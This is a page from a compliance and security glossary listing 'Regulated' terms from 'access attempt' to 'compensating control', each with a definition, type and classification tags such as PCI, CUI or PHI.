Browse — Sensitivity · Regulated

1131 terms
TermTypeDefinitionClassificationsUpdated
access attemptnounA process of interaction with a communications system by one or more users to enable initiation of user information transfer. The process begins with the granting of an access request by an access originator, and ends in either successful access or access failure.EventRegulatedMay 12, 2026
access codenounNumeric or alphanumeric data which, when entered correctly, authorizes entry into a secure area.CredentialRegulatedMay 9, 2026
Access Control programnounA documented listing of procedures, schedules, roles and responsibilities, and plans or instructions to be performed to implement access control.ControlRegulatedPCIMay 9, 2026
access lognounA log that lists who has been permitted to physically or logically gain access.ArtifactRegulatedCUIMay 12, 2026
Access Management AccessnounManagement is the maintenance of access information which consists of four tasks: account administration, maintenance, monitoring, and revocation.ProcessRegulatedMay 12, 2026
access revocation programnounA documented listing of procedures, schedules, roles and responsibilities, and plans to be performed to revoke access privileges.ProcessRegulatedCDIMay 12, 2026
Account Balancing Monitoring System (ABMS)nounThe Federal Reserve's computing system providing reserve account information to the Federal Reserve Banks and depository institutions on an intraday basis. ABMS serves both as an informational source and a monitoring tool. This information includes opening balances, funds and securities transfers, accounting activity, and depository institutions cap and collateral limits.SystemRegulatedCUIMay 12, 2026
account typenounA category for various accounts that are on a computer system.IdentityRegulatedMay 12, 2026
Account-To-Account Payment (A2A)nounPayment system that allows the consumer to direct transfer of funds from one account to another account at a different financial institution.ProcessRegulatedPCIMay 12, 2026
Accounting Legend CodenounNumeric code used to indicate the minimum accounting controls required for items of accountable communications security (COMSEC) material within the COMSEC Material Control System.RequirementRegulatedCUIMay 9, 2026
Accounting NumbernounNumber assigned to an item of COMSEC material to facilitate its control.ArtifactRegulatedCDIMay 9, 2026
Accreditation PackagenounProduct comprised of a System Security Plan (SSP) and a report documenting the basis for the accreditation decision.ArtifactRegulatedCUIMay 9, 2026
Accrediting AuthoritynounSynonymous with Designated Accrediting Authority (DAA). See also Authorizing Official.OrganizationRegulatedMay 12, 2026
accuracynounThe quality or state of being correct, precise, or near to the true value.MetricRegulatedMay 13, 2026
Acquirer FeenounFee paid to the acquirer of the merchant sales draft. The acquirer of the sales draft collects a merchant discount fee (or processing fee) from the merchant for the costs associated with processing the transaction.RequirementRegulatedPCIMay 9, 2026
Acquiring Bank and AcquirernounSee Merchant acquirer.OrganizationRegulatedPCIMay 9, 2026
action itemnounA documented event, task or action that needs to take place. Action items are discreet units that can be handled by a single person.ArtifactRegulatedMay 12, 2026
Activation DatanounPrivate data, other than keys, that are required to access cryptographic modules.DataRegulatedCUIMay 9, 2026
activity reportingnounThe action of providing an description of an account holder's activity.ArtifactRegulatedPIIMay 9, 2026
additionnounMaterials added to an existing collection; an accretion; an accrual.ArtifactRegulatedMay 9, 2026
Address Verification Service (AVS)nounBankcard company service that verifies the customer-provided billing address matches the billing address on their credit card account. The bankcard companies will not support merchants that opt for not using AVS if those transactions are disputed and will charge the merchant an additional 1.25% on those sales.CapabilityRegulatedPCIMay 9, 2026
Adequate SecuritynounSecurity commensurate with the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of information. Note: This includes assuring that information systems operate effectively and provide appropriate confidentiality, integrity, and availability, through the use of cost-effective management, personnel, operational, and technical controls.RequirementRegulatedMay 12, 2026
Administrative SafeguardsnounAdministrative actions, policies, and procedures to manage the selection, development, implementation, and maintenance of security measures to protect electronic health information and to manage the conduct of the covered entity's workforce in relation to protecting that information.ControlRegulatedPHIMay 9, 2026
Advanced Encryption StandardnounThe Advanced Encryption Standard specifies a U.S. government-approved cryptographic algorithm that can be used to protect electronic data. The AES algorithm is a symmetric block cipher that can encrypt (encipher) and decrypt (decipher) information. This standard specifies the Rijndael algorithm, a symmetric block cipher that can process data blocks of 128 bits, using cipher keys with lengths of 128, 192, and 256 bits.ControlRegulatedMay 9, 2026
Advanced Key ProcessornounA cryptographic device that performs all cryptographic functions for a management client node and contains the interfaces to 1) exchange information with a client platform, 2) interact with fill devices, and 3) connect a client platform securely to the primary services node (PRSN).PhysicalRegulatedCUIMay 9, 2026
Adverse Action NoticenounRegulatedMay 13, 2026
Adverse Impact RationounMetricRegulatedMay 13, 2026
affected partynounThis role is focused on contracting parties who are affected by organizational activities. Any individual who is in a contract and is affected by organizational activities should be assigned to this role.IdentityRegulatedMay 9, 2026
affiliatenounThis role focuses on persons who are affiliated with other persons or organizations or on organizations or individuals that control or are controlled by a third party. Any person associated with another person or organization or any organization or individual being controlled by or controlling a third party should be assigned to this role.RoleRegulatedMay 9, 2026
AgencynounAny executive department, military department, government corporation, government-controlled corporation, or other establishment in the executive branch of the government (including the Executive Office of the President), or any independent regulatory agency, but does not include: 1) the Government Accountability Office; 2) the Federal Election Commission; 3) the governments of the District of Columbia and of the territories and possessions of the United States, and their various subdivisions; or 4) government-owned contractor-operated facilities, including laboratories engaged in national defense research and production activities.OrganizationRegulatedCUIMay 9, 2026
Agency Certification AuthoritynounA CA that acts on behalf of an agency and is under the operational control of an agency.CapabilityRegulatedCUIMay 9, 2026
Agent BanknounA member of a bankcard company that agrees to participate in an acquirer's merchant processing program. The agent may be liable for losses incurred on its merchant accounts. An agent is usually a small financial institution that wants to offer merchant processing services as a customer service. Agent banks that only refer merchants to an acquiring financial institution's program are known as referral banks.OrganizationRegulatedMay 9, 2026
Aggregate Short PositionnounThe sum of a Settlement Member's short positions, each such short position expressed in its base currency equivalent and adjusted by the applicable haircut.MetricRegulatedMay 9, 2026
Aggregate Short Position LimitnounIn respect of a Settlement Member, the maximum aggregate short position that such Settlement Member is permitted to incur at any time.RequirementRegulatedMay 12, 2026
agreementnounThis record category contains records of mutual understandings, written or verbal, made by two or more parties regarding a matter of opinion or their rights and obligations toward each other.RequirementRegulatedMay 12, 2026
Alternate processnounAutomatic or manual process designed and established to continue critical business processes from point-of- failure to return-to-normalProcessRegulatedMay 12, 2026
Alternate Work SitenounGovernmentwide, national program allowing federal employees to work at home or at geographically convenient satellite offices for part of the work week (e.g., telecommuting).PhysicalRegulatedMay 12, 2026
anomalous transactionnounA transaction that deviates from the standards, procedures, and processes used to create a transaction.EventRegulatedPCIMay 9, 2026
AnonymizationnounProcessRegulatedMay 13, 2026
Anti-jamnounCountermeasures ensuring that transmitted information can be received despite deliberate jamming attempts.ControlRegulatedCUIMay 9, 2026
applicable requirementnounThe relevant or appropriate necessary condition or conditions.RequirementRegulatedMay 12, 2026
application controlnounControls related to transactions and data within application systems. Application controls ensure the completeness and accuracy of the records and the validity of the entries made resulting from both programmed processing and manual data entry. Examples of application controls include data input validation, agreement of batch totals and encryption of data transmitted.ControlRegulatedMay 12, 2026
Approval to OperatenounThe official management decision issued by a DAA or PAA to authorize operation of an information system and to explicitly accept the residual risk to agency operations (including mission, functions, image, or reputation), agency assets, or individuals.ArtifactRegulatedCUIMay 9, 2026
ApprovednounFederal Information Processing Standard (FIPS)-approved or National Institute of Standards and Technology (NIST)-recommended. An algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation, or 2) adopted in a FIPS or NIST Recommendation.RequirementRegulatedMay 9, 2026
Approved Mode of OperationnounA mode of the cryptographic module that employs only Approved security functions (not to be confused with a specific mode of an Approved security function, e.g., Data Encryption Standard Cipher-Block Chaining (DES CBC) mode).ControlRegulatedCUIMay 12, 2026
Approved Security FunctionnounA security function (e.g., cryptographic algorithm, cryptographic key management technique, or authentication technique) that is either a) specified in an Approved Standard; b) adopted in an Approved Standard and specified either in an appendix of the Approved Standard or in a document referenced by the Approved Standard; or c) specified in the list of Approved security functions.CapabilityRegulatedMay 9, 2026
assessed risknounA detected and evaluated risk. An assessed risk of material misstatement at the assertion level is a significant risk.FindingRegulatedMay 12, 2026
Assessment ObjectivenounA set of determination statements that expresses the desired outcome for the assessment of a security control or control enhancement.RequirementRegulatedMay 12, 2026
asset physical securitynounThe protection of assets from theft, vandalism, natural disasters, and accidental damage.ControlRegulatedMay 9, 2026
Asset Reporting FormatnounSCAP data model for expressing the transport format of information about assets (components) and the relationships between assets and reports.ArtifactRegulatedCUIMay 9, 2026
Assured Information SharingnounThe ability to confidently share information with those who need it, when and where they need it, as determined by operational need and an acceptable level of security risk.CapabilityRegulatedCUIMay 9, 2026
Attribute AuthoritynounAn entity, recognized by the Federal Public Key Infrastructure (PKI) Policy Authority or comparable agency body as having the authority to verify the association of attributes to an identity.OrganizationRegulatedCUIMay 9, 2026
audit activitynounThose activities and procedures through which information is obtained to verify conformance to regulatory or organizational requirementsProcessRegulatedMay 9, 2026
audit committeenounAn operating committee of the Board of Directors charged with oversight of audit operations, including appraising the performance of the CPA firm, financial reporting and disclosure. Committee members are drawn from members of the company's board of directors, with a Chairperson selected from among the committee members.OrganizationRegulatedMay 9, 2026
audit cyclenounThe accounting process that auditors employ in the review of a company's financial information. The audit cycle includes the steps that an auditor will take to ensure that the company's financial information is valid and accurate before releasing any financial statements.ProcessRegulatedMay 9, 2026
Audit DatanounChronological record of system activities to enable the reconstruction and examination of the sequence of events and changes in an event.DataRegulatedMay 12, 2026
audit findingnounThe documented conclusion reached as a result of an official inspection of an organization’s accounts or other item or process being audited, typically by an independent body.FindingRegulatedMay 12, 2026
audit lognounA chronological record of system activities. Includes records of system accesses and operations performed in a given period.ArtifactRegulatedMay 13, 2026
Audit Log eventnounAny of the various triggering actions that cause an application to write a new entry into the log.ArtifactRegulatedCUIMay 9, 2026
audit recordnounAn individual entry in an audit log related to an audited event.ArtifactRegulatedCUIMay 9, 2026
audit reportnounA report issued by an independent Auditor that expresses an opinion about whether the financial statements present fairly a company's financial position, operating results, and cash flows in accordance with generally accepted accounting principles.ArtifactRegulatedMay 12, 2026
Audit ReviewnounThe assessment of an information system to evaluate the adequacy of implemented security controls, assure that they are functioning properly, identify vulnerabilities, and assist in implementation of new security controls where required. This assessment is conducted annually or whenever significant change has occurred and may lead to recertification of the information system.ProcessRegulatedCUIMay 12, 2026
audit standardnounRules prescribed for auditors by various national and international organizations such as the Auditing Practices Board (in the UK) and the Auditing Standards Board (in the US).FrameworkRegulatedMay 12, 2026
Audit trailnounA chronological record that reconstructs and examines the sequence of activities surrounding or leading to a specific operation, procedure, or event in a security relevant transaction from inception to final result.ArtifactRegulatedMay 12, 2026
Audit Work PapernounThis record category contains records of working papers that are vital to the successful accomplishment of all audit assignments performed.ArtifactRegulatedMay 12, 2026
Authentication CodenounA cryptographic checksum based on an Approved security function (also known as a Message Authentication Code [MAC]).CredentialRegulatedMay 12, 2026
authentication controlnounOne of several systems which restrict user access to a network.ControlRegulatedMay 9, 2026
authentication methodnounA method of Verifying the identity of a user, such as a challenge password or a digital certificate.ControlRegulatedMay 12, 2026
Authentication PeriodnounThe maximum acceptable period between any initial authentication process and subsequent reauthentication processes during a single terminal session or during the period data is being accessed.RequirementRegulatedCUIMay 12, 2026
Authentication ProtocolnounA defined sequence of messages between a Claimant and a Verifier that demonstrates that the Claimant has possession and control of a valid token to establish his/her identity, and optionally, demonstrates to the Claimant that he or she is communicating with the intended Verifier.ProcessRegulatedMay 12, 2026
Authorization (ACH)nounA written or oral agreement between the originator and a receiver that allows payments processed through the ACH network to be deposited in, or withdrawn from, the receiver's account at a financial institution.RequirementRegulatedPCIMay 9, 2026
Authorization BoundarynounAll components of an information system to be authorized for operation by an authorizing official and excludes separately authorized systems, to which the information system is connected.RequirementRegulatedMay 9, 2026
authorization recordnounA document or identifier which provides evidence of authorization.ArtifactRegulatedCUIMay 9, 2026
Authorization to operatenounThe official management decision given by a senior organizational official to authorize operation of an information system and to explicitly accept the risk to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, and the Nation based on the implementation of an agreed-upon set of security controls.ArtifactRegulatedCUIMay 9, 2026
authorized accessnounAccess to system components that (a) has been approved by a person designated to do so by management and (b) does not compromise segregation of duties, confidentiality commitments, or otherwise increase risk to the system beyond the levels approved by management (that is, access is appropriate).ControlRegulatedMay 9, 2026
Authorized VendornounManufacturer of information assurance equipment authorized to produce quantities in excess of contractual requirements for direct sale to eligible buyers. Eligible buyers are typically U.S. government organizations or U.S. government contractors.OrganizationRegulatedMay 12, 2026
Authorized Vendor ProgramnounProgram in which a vendor, producing an information systems security (INFOSEC) product under contract to NSA, is authorized to produce that product in numbers exceeding the contracted requirements for direct marketing and sale to eligible buyers. Eligible buyers are typically U.S. government organizations or U.S. government contractors. Products approved for marketing and sale through the AVP are placed on the Endorsed Cryptographic Products List (ECPL).ProcessRegulatedMay 9, 2026
Authorizing Official Designated RepresentativenounAn organizational official acting on behalf of an authorizing official in carrying out and coordinating the required activities associated with security authorization.RoleRegulatedMay 12, 2026
Automated Clearing House (ACH)nounAn electronic clearing system in which a data processing center handles payment orders that are exchanged among financial institutions, primarily via telecommunications networks. ACH systems process large volumes of individual payments electronically. Typical ACH payments include salaries, consumer and corporate bill payments, interest and dividend payments, and Social Security payments.SystemRegulatedPCIMay 9, 2026
automated clearing house activitynounAny transaction made through the Automated Clearing House network.EventRegulatedPCIMay 9, 2026
automated clearing house capturenounA service that allows a user to transmit automated clearing house data to a bank for posting and clearing.CapabilityRegulatedPCIMay 9, 2026
Automated ControlsnounSoftware routines designed into programs to ensure the validity, accuracy, completeness, and availability of input, processed, and stored data.ControlRegulatedMay 12, 2026
Automated Key TransportnounThe transport of cryptographic keys, usually in encrypted form, using electronic means such as a computer network (e.g., key transport/agreement protocols).ProcessRegulatedMay 12, 2026
Automated Teller Machine (ATM)nounAn electronic funds transfer (EFT) terminal that allows customers using a PIN-based debit (ATM) card to initiate transactions (e.g., deposits, withdrawals, account balance inquiries).PhysicalRegulatedPCIMay 9, 2026
Automatic Remote RekeyingnounProcedure to rekey a distant crypto-equipment electronically without specific actions by the receiving terminal operator. See Manual Remote Rekeying.ProcessRegulatedCUIMay 9, 2026
availability requirementnounAvailability requirement relates to the need for information to be available when required.RequirementRegulatedMay 9, 2026
Back Office Conversion (BOC)nounUnder NACHA rules, BOC allows retailers and billers that accept checks at the point-of-sale or at manned bill payment locations to convert eligible checks to ACH debits in the back-office.ProcessRegulatedPCIMay 9, 2026
Back-up GenerationsnounA tape rotation methodology that creates three sets of back-up tapes: daily incremental sets or "sons," weekly full sets or "fathers," and end-of-month tapes or "grandfathers." This back-up methodology is frequently used to refer to master files for financial applications.ProcessRegulatedMay 12, 2026
backgroundnounA persons previous experience, education, or social circumstances.ArtifactRegulatedPIIMay 9, 2026
Backtracking ResistancenounBacktracking resistance is provided relative to time T if there is assurance that an adversary who has knowledge of the internal state of the Deterministic Random Bit Generator (DRBG) at some time subsequent to time T would be unable to distinguish between observations of ideal random bitstrings and (previously unseen) bitstrings that were output by the DRBG prior to time T. The complementary assurance is called Prediction Resistance.ControlRegulatedMay 9, 2026
Bank Identification Number/Interbank Card Company (BIN/ICA)nounA series of assigned numbers used to identify the settling financial institution for both acquiring and issuing bankcard transactions.DataRegulatedPCIMay 9, 2026
Bank Secrecy ActnounThe Currency and Foreign Transactions Reporting Act, also known as the Bank Secrecy Act (BSA), and its implementing regulation, 31 CFR 103, is a tool the U.S. government uses to fight drug trafficking, money laundering, and other crimes. Congress enacted the BSA to prevent banks and other financial service providers from being used as intermediaries for, or to hide the transfer or deposit of money derived from, criminal activity.FrameworkRegulatedMay 12, 2026
BankcardnounA general-purpose credit card, issued by a financial institution under agreement with the bankcard associations (Visa and MasterCard), which customers can use to purchase goods and services and to obtain cash against a line of credit established by the bankcard issuer.DataRegulatedPCIMay 9, 2026
BaselinenounHardware, software, databases, and relevant documentation for an information system at a given point in time.ArtifactRegulatedMay 12, 2026
Bastion HostnounA special-purpose computer on a network specifically designed and configured to withstand attacks.SystemRegulatedMay 12, 2026
Batch ProcessingnounThe transmission or processing of a group of related payment instructions.ProcessRegulatedPCIMay 9, 2026
beforenounThis limits a Control or Mandate's secondary verb to be put into play prior to the event taking place.ControlRegulatedMay 12, 2026
Bilateral Key SecuritynounA multi-level data encryption system, based on the exchange of Bilateral Keys, allowing users of SWIFT to create, send, and receive SWIFT messages. Bilateral Keys are unique authenticator keys possessed by only the two parties (either the provider or recipient of a message) involved and provide confirmation in both directions of the legitimacy of a message sent via SWIFT.ControlRegulatedMay 12, 2026
billingnounRequest for payment of a debt.DataRegulatedMay 12, 2026
BindingnounAn acknowledgement by a trusted third party that associates an entity’s identity with its public key. This may take place through (1) a certification authority’s generation of a public key certificate, (2) a security officer’s verification of an entity’s credentials and placement of the entity’s public key and identifier in a secure database, or (3) an analogous method.ProcessRegulatedMay 12, 2026
Biometric DatanounCredentialRegulatedPIIMay 13, 2026
Black CorenounA communication network architecture in which user data traversing a global Internet Protocol (IP) network is end-to-end encrypted at the IP layer. Related to striped core.NetworkRegulatedCUIMay 12, 2026
BlacklistingnounThe process of the system invalidating a user ID based on the user’s inappropriate actions. A blacklisted user ID cannot be used to log on to the system, even with the correct authenticator. Blacklisting and lifting of a blacklisting are both security-relevant events. Blacklisting also applies to blocks placed against IP addresses to prevent inappropriate or unauthorized use of Internet resources.ProcessRegulatedMay 9, 2026
BlocknounSequence of binary bits that comprise the input, output, State, and Round Key. The length of a sequence is the number of bits it contains. Blocks are also interpreted as arrays of bytes.DataRegulatedMay 12, 2026
Body of EvidencenounThe set of data that documents the information system’s adherence to the security controls applied. The BoE will include a Requirements Verification Traceability Matrix (RVTM) delineating where the selected security controls are met and evidence to that fact can be found. The BoE content required by an Authorizing Official will be adjusted according to the impact levels selected.ArtifactRegulatedCUIMay 9, 2026
botnounA computer connected to the Internet that has been surreptitiously / secretly compromised with malicious logic to perform activities under remote the command and control of a remote administrator.ThreatRegulatedMay 9, 2026
Boundary ProtectionnounMonitoring and control of communications at the external boundary of an information system to prevent and detect malicious and other unauthorized communication, through the use of boundary protection devices (e.g., proxies, gateways, routers, firewalls, guards, encrypted tunnels).ControlRegulatedMay 12, 2026
boundary protection devicenounA device with appropriate mechanisms that: (i) facilitates the adjudication of different interconnected system security policies (e.g., controlling the flow of information into or out of an interconnected system); and/or (ii) provides information system boundary protection.NetworkRegulatedMay 12, 2026
BreachnounEventRegulatedPIIMay 13, 2026
Bulk Electric System Cyber SystemnounOne or more Bulk Electric System (BES) Cyber Assets logically grouped by a responsible entity to perform one or more reliability tasks for a functional entity.SystemRegulatedCUIMay 9, 2026
Bulk Electric System Cyber System InformationnounInformation about the BES Cyber System that could be used to gain unauthorized access or pose a security threat to the BES Cyber System. BES Cyber System Information does not include individual pieces of information that by themselves do not pose a threat or could not be used to allow unauthorized access to BES Cyber Systems, such as, but not limited to, device names, individual IP addresses without context, ESP names, or policy statements. Examples of BES Cyber System Information may include, but are not limited to, security procedures or security information about BES Cyber Systems, Physical Access Control Systems, and Electronic Access Control or Monitoring Systems that is not publicly available and could be used to allow unauthorized access or unauthorized distribution; collections of network addresses; and network topology of the BES Cyber System.DataRegulatedCUIMay 9, 2026
business continuitynounThe providing of critical business functions to customers, suppliers, regulators, and other entities at acceptable predefined levels after incidents and business interruptions.ProcessRegulatedMay 12, 2026
Business Continuity planningnounThe act of creating processes and procedures to put into place to ensure that essential organizational functions can continue during and after a disaster.ProcessRegulatedMay 12, 2026
cablenounA wire or group of wires covered in a protective casing used for transmitting electricity or telecommunication signals.PhysicalRegulatedMay 9, 2026
Call BacknounProcedure for identifying and authenticating a remote information system terminal, whereby the host system disconnects the terminal and reestablishes contact.ProcessRegulatedMay 9, 2026
CanisternounType of protective package used to contain and dispense keying material in punched or printed tape form.PhysicalRegulatedCUIMay 9, 2026
Capstone PoliciesnounThose policies that are developed by governing or coordinating institutions of Health Information Exchanges (HIEs). They provide overall requirements and guidance for protecting health information within those HIEs. Capstone Policies must address the requirements imposed by: (1) all laws, regulations, and guidelines at the federal, state, and local levels; (2) business needs; and (3) policies at the institutional and HIE levels.RequirementRegulatedPHIMay 9, 2026
CapturenounThe method of taking a biometric sample from an end user.ProcessRegulatedPIIMay 9, 2026
Card IssuernounA financial institution that issues general-purpose credit cards carrying one of the two bankcard company logos. The issuing financial institution establishes the credit relationship with the consumer.OrganizationRegulatedPCIMay 9, 2026
Card Verification Code (CVC2)nounNumeric security code printed on the back of MasterCard credit cards. CVC2 reduces credit card fraud and chargeback instances significantly when used in conjunction with AVS. (See Address verification service).CredentialRegulatedPCIMay 9, 2026
Card Verification Value (CVV2)nounThree-digit security number that is printed on the back of most Visa credit cards. CVV2 reduces credit card fraud and chargeback instances significantly when used in conjunction with AVS.CredentialRegulatedPCIMay 9, 2026
CardholdernounAn individual possessing an issued Personal Identity Verification (PIV) card.IdentityRegulatedCUIMay 9, 2026
CascadingnounDownward flow of information through a range of security levels greater than the accreditation range of a system, network, or component.EventRegulatedCUIMay 9, 2026
Cash LetternounA group of checks accompanied by a paper listing sent to a clearinghouse, a Federal Reserve Bank, or another institution. A cash letter contains a number of negotiable items, mostly checks, accompanied by a letter that lists the amounts and instructions for transmittal to another bank. May also be called a transmittal letter. An incoming cash letter is one that is received by an institution from a clearinghouse, a Federal Reserve Bank, or another institution and contains checks written on accounts at the institution that were cashed elsewhere. An outgoing cash letter is one that is being sent to a clearinghouse, a Federal Reserve Bank, or another institution and contains checks deposited at the institution, which are written on accounts at other institutions.ArtifactRegulatedPIIMay 9, 2026
categorizationnounAn established category.ProcessRegulatedMay 12, 2026
CategorynounRestrictive label applied to classified or unclassified information to limit access.RequirementRegulatedCUIMay 9, 2026
Central Office of RecordnounOffice of a federal department or agency that keeps records of accountable COMSEC material held by elements subject to its oversightOrganizationRegulatedCUIMay 9, 2026
CertificationnounA comprehensive assessment of the management, operational, and technical security controls in an information system, made in support of security accreditation, to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.ProcessRegulatedMay 9, 2026
Certification authoritynoun1. For Certification and Accreditation (C&A) (C&A Assessment): Official responsible for performing the comprehensive evaluation of the security features of an information system and determining the degree to which it meets its security requirements 2. For Public Key Infrastructure (PKI): A trusted third party that issues digital certificates and verifies the identity of the holder of the digital certificate.OrganizationRegulatedCUIMay 12, 2026
Certification PackagenounProduct of the certification effort documenting the detailed results of the certification activities.ArtifactRegulatedCUIMay 9, 2026
Certification Test and EvaluationnounSoftware and hardware security tests conducted during development of an information system.ProcessRegulatedMay 12, 2026
Certified TEMPEST Technical AuthoritynounAn experienced, technically qualified U.S. government employee who has met established certification requirements in accordance with CNSS-approved criteria and has been appointed by a U.S. government department or agency to fulfill CTTA responsibilities.RoleRegulatedCUIMay 9, 2026
Chain of custodynounA process that tracks the movement of evidence through its collection, safeguarding, and analysis lifecycle by documenting each person who handled the evidence, the date/time it was collected or transferred, and the purpose for the transfer.ProcessRegulatedMay 9, 2026
Chain of EvidencenounA process and record that shows who obtained the evidence; where and when the evidence was obtained; who secured the evidence; and who had control or possession of the evidence. The “sequencing” of the chain of evidence follows this order: collection and identification; analysis; storage; preservation; presentation in court; return to owner.ProcessRegulatedCUIMay 9, 2026
change to applicationnounAny addition or modification to or within an application.EventRegulatedMay 9, 2026
ChargebacknounA transaction generated when a cardholder disputes a transaction or when the merchant does not follow bankcard company procedures. The issuer and acquirer research the facts to determine which party is responsible for the transaction. If the merchant is unable to pay, the acquirer will have to cover the chargeback.EventRegulatedPCIMay 9, 2026
ChecknounA written order from one party (payer) to another (payee) requiring the payer's financial institution to pay a specified sum on demand to the payee or to a third party specified by the payee.ArtifactRegulatedPCIMay 12, 2026
Check 21 ActnounFormally known as the Check Clearing for the 21st Century Act. Creates a new document, the IRD (image replacement document or substitute check) that is the legal equivalent of the original check and should be accepted as such. The act does not require institutions to accept electronic images instead of checks or IRDs, but does require the acceptance of IRDs instead of paper checks. The exchange of electronic images is optional and will be done by agreements between individual institutions, groups of institutions, or clearinghouses.FrameworkRegulatedPCIMay 9, 2026
Check ClearingnounThe movement of a check from the depository institution where it was deposited to the institution on which it was written. The funds move in the opposite direction, with a corresponding credit and debit to the involved accounts.ProcessRegulatedMay 12, 2026
Check ImagenounElectronic or digital image of an original check that is created by a depositor, a bank or other participant in the check collection process. Check images can be exchanged electronically by financial institutions, printed for customer statement purposes, displayed on Internet banking websites, and used to create substitute checks.DataRegulatedPCIMay 9, 2026
Check TruncationnounThe practice of holding a check at the institution where it was deposited (or at an intermediary institution) and electronically forwarding the essential information on the check to the institution on which it was written. A truncated check is not returned to the writer.ProcessRegulatedPCIMay 9, 2026
Check WordnounCipher text generated by cryptographic logic to detect failures in cryptography.ControlRegulatedCUIMay 12, 2026
Chief Information OfficernounAgency official responsible for: 1) providing advice and other assistance to the head of the executive agency and other senior management personnel of the agency to ensure that information systems are acquired and information resources are managed in a manner that is consistent with laws, Executive Orders, directives, policies, regulations, and priorities established by the head of the agency; 2) developing, maintaining, and facilitating the implementation of a sound and integrated information system architecture for the agency; and 3) promoting the effective and efficient design and operation of all major information resources management processes for the agency, including improvements to work processes of the agency. Note: Organizations subordinate to federal agencies may use the term Chief Information Officer to denote individuals filling positions with similar security responsibilities to agency-level Chief Information Officers.RoleRegulatedMay 12, 2026
Chief Information Security OfficernounThe person in charge of information security within the enterprise.RoleRegulatedMay 9, 2026
CIP exceptional circumstancenounA situation that involves or threatens to involve one or more of the following, or similar, conditions that impact safety or Bulk Electric System (BES) reliability: a risk of injury or death; a natural disaster; civil unrest; an imminent or existing hardware, software, or equipment failure; a Cyber Security Incident requiring emergency assistance; a response by emergency services; the enactment of a mutual assistance agreement; or an impediment of large scale workforce availability.RequirementRegulatedCUIMay 12, 2026
CIP Senior ManagernounA single senior management official with overall authority and responsibility for leading and managing implementation of and continuing adherence to the requirements within the NERC CIP Standards, CIP-002 through CIP-011.RoleRegulatedCUIMay 12, 2026
Ciphertext/Cipher TextnounData in its encrypted form.DataRegulatedMay 12, 2026
ClaimantnounAn entity which is or represents a principal for the purposes of authentication, together with the functions involved in an authentication exchange on behalf of that entity. A claimant acting on behalf of a principal must include the functions necessary for engaging in an authentication exchange. (e.g., a smartcard [claimant] can act on behalf of a human user [principal])IdentityRegulatedPIIMay 12, 2026
Classified Information SpillagenounSecurity incident that occurs whenever classified data is spilled either onto an unclassified information system or to an information system with a lower level of classification.EventRegulatedCUIMay 9, 2026
Classified National Security InformationnounInformation that has been determined pursuant to Executive Order 13526 or any predecessor order to require protection against unauthorized disclosure and is marked to indicate its classified status when in documentary form.DataRegulatedCUIMay 9, 2026
ClearancenounFormal certification of authorization to have access to classified information other than that protected in a special access program (including SCI). Clearances are of three types: confidential, secret, and top secret. A top secret clearance permits access to top secret, secret, and confidential material; a secret clearance, to secret and confidential material; and a confidential clearance, to confidential material.CredentialRegulatedCUIMay 9, 2026
ClearingnounRemoval of data from an information system, its storage devices, and other peripheral devices with storage capacity, in such a way that the data may not be reconstructed using common system capabilities (i.e., through the keyboard); however, the data may be reconstructed using laboratory methods.ProcessRegulatedCUIMay 12, 2026
Clearing CorporationnounAlso known as a clearing house or clearing house association. A central processing mechanism whereby members agree to net, clear, and settle transactions involving financial instruments. Clearing corporations fulfill one or all of the following functions: Net many trades so that the number and the amount of payments that have to be made are minimized, determine money obligations among traders, and guarantee that trades will go through by legally assuming the risk of payments not made or securities not delivered. The latter function is implied when it is stated that the clearing corporation becomes the "counterpart" to all trades entered into its system.OrganizationRegulatedMay 12, 2026
Clearing House AssociationsnounVoluntary associations, formed by financial institutions that establish an exchange for checks drawn on them. Typically, institutions participating in check clearing houses use the Federal Reserve's National Settlement Service for the checks exchanged each business day.OrganizationRegulatedMay 9, 2026
Clearing House Interbank Payment Systems (CHIPS)nounA "real time," multilateral, final payments system for large dollar value, business-to-business payment transactions between domestic or foreign institutions that have offices located in the United States. CHIPS is run by CHIP Co. LLC, a subsidiary of The Clearing House Payments Company, LLC.SystemRegulatedMay 12, 2026
Clinger-Cohen Act of 1996nounAlso known as Information Technology Management Reform Act. A statute that substantially revised the way that IT resources are managed and procured, including a requirement that each agency design and implement a process for maximizing the value and assessing and managing the risks of IT investments.RequirementRegulatedMay 12, 2026
Closed Security EnvironmentnounEnvironment providing sufficient assurance that applications and equipment are protected against the introduction of malicious logic during an information system life cycle. Closed security is based upon a system's developers, operators, and maintenance personnel having sufficient clearances, authorization, and configuration control.SystemRegulatedCUIMay 12, 2026
Closed StoragenounStorage of classified information within an accredited facility, in General Services Administration-approved secure containers, while the facility is unoccupied by authorized personnel.ControlRegulatedCUIMay 9, 2026
Code GroupnounGroup of letters, numbers, or both in a code system used to represent a plain text word, phrase, or sentence.DataRegulatedCUIMay 12, 2026
Cold SitenounBackup site that can be up and operational in a relatively short time span, such as a day or two. Provision of services, such as telephone lines and power, is taken care of, and the basic office furniture might be in place, but there is unlikely to be any computer equipment, even though the building might well have a network infrastructure and a room ready to act as a server room. In most cases, cold sites provide the physical location and basic services.PhysicalRegulatedMay 12, 2026
Cold StartnounProcedure for initially keying crypto-equipment.ProcessRegulatedCUIMay 9, 2026
Command AuthoritynounIndividual responsible for the appointment of user representatives for a department, agency, or organization and their key ordering privileges.RoleRegulatedMay 12, 2026
Commercial COMSEC Evaluation ProgramnounRelationship between NSA and industry in which NSA provides the COMSEC expertise (i.e., standards, algorithms, evaluations, and guidance) and industry provides design, development, and production capabilities to produce a type 1 or type 2 product. Products developed under the CCEP may include modules, subsystems, equipment, systems, and ancillary devices.ProcessRegulatedCUIMay 9, 2026
Common Access CardnounStandard identification/smart card issued by the Department of Defense that has an embedded integrated chip storing public key infrastructure (PKI) certificates.CredentialRegulatedCUIMay 9, 2026
Common CarriernounIn a telecommunications context, a telecommunications company that holds itself out to the public for hire to provide communications transmission services. Note: In the United States, such companies are usually subject to regulation by federal and state regulatory commissions.OrganizationRegulatedMay 12, 2026
Common Fill DevicenounPhysicalRegulatedCUIMay 8, 2026
communication systemnounSystemRegulatedMay 8, 2026
Compartmented ModenounControlRegulatedCUIMay 8, 2026
compensating controlnounControlRegulatedMay 8, 2026
